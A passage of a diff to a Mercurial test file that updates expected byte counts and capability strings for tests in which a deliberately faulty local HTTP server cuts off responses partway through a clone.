!) - write(20 from 450) -> (0) batch branchmap bund (py3 no-py36 !) + sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(20 from 431) -> (0) batch branchmap bund (py36 !) + write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(20 from 431) -> (0) batch branchmap bund (py3 no-py36 !) write(36 from 36) -> (144) HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23 from 23) -> (121) Server: badhttpserver\r\n (no-py3 !) write(37 from 37) -> (84) Date: $HTTP_DATE$\r\n (no-py3 !) write(41 from 41) -> (43) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (22) Content-Length: 450\r\n (no-py3 !) + write(21 from 21) -> (22) Content-Length: 431\r\n (no-py3 !) write(2 from 2) -> (20) \r\n (no-py3 !) - write(20 from 450) -> (0) batch branchmap bund (no-py3 !) + write(20 from 431) -> (0) batch branchmap bund (no-py3 !) write limit reached; closing socket $LOCALIP - - [$ERRDATE$] Exception happened during processing request '/?cmd=capabilities': (glob) Traceback (most recent call last): @@ -341,7 +341,7 @@ Server sends incomplete headers for batch request - $ hg serve --config badserver.closeaftersendbytes=728 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=709 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is horrible @@ -363,17 +363,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (692) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (669) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (632) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (591) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (570) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (568) \r\n (no-py3 !) - write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (549) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (673) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (650) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (613) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (572) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (551) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (549) \r\n (no-py3 !) + write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -401,7 +401,7 @@ Server sends an incomplete HTTP response body to batch request - $ hg serve --config badserver.closeaftersendbytes=793 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=774 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO client spews a stack due to uncaught ValueError in batch.results() @@ -422,17 +422,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (757) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (734) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (697) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (656) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (635) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (633) \r\n (no-py3 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (614) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (738) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (715) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (678) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (637) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (616) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (614) \r\n (no-py3 !) + write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -463,7 +463,7 @@ Server sends incomplete headers for getbundle response - $ hg serve --config badserver.closeaftersendbytes=940 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=921 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is terrible @@ -486,17 +486,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (904) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (881) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (844) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (803) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (782) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (780) \r\n (no-py3 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (761) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (885) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (862) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (825) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (784) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (763) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (761) \r\n (no-py3 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -520,7 +520,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) @@ -544,7 +544,7 @@ Server stops before it sends transfer encoding - $ hg serve --config badserver.closeaftersendbytes=973 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=954 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -573,7 +573,7 @@ Server sends empty HTTP body for getbundle - $ hg serve --config badserver.closeaftersendbytes=978 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=959 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -591,17 +591,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (942) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (919) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (882) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (841) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (820) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (818) \r\n (no-py3 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (799) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (923) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (900) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (863) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (822) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (801) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (799) \r\n (no-py3 !) + write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -625,7 +625,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) @@ -651,7 +651,7 @@ Server sends partial compression string - $ hg serve --config badserver.closeaftersendbytes=1002 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=983 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -669,17 +669,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (966) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (943) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (906) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (865) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (844) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (842) \r\n (no-py3 !) - write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (823) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (947) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (924) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (887) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (846) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (825) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (823) \r\n (no-py3 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -702,7 +702,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) @@ -733,7 +733,7 @@ Server sends partial bundle2 header magic - $ hg serve --config badserver.closeaftersendbytes=999 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=980 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -778,7 +778,7 @@ Server sends incomplete bundle2 stream params length - $ hg serve --config badserver.closeaftersendbytes=1008 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=989 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -825,7 +825,7 @@ Servers stops after bundle2 stream params header - $ hg serve --config badserver.closeaftersendbytes=1011 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=992 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -871,7 +871,7 @@ Server stops sending after bundle2 part header length - $ hg serve --config badserver.closeaftersendbytes=1020 -p $HGPORT -d 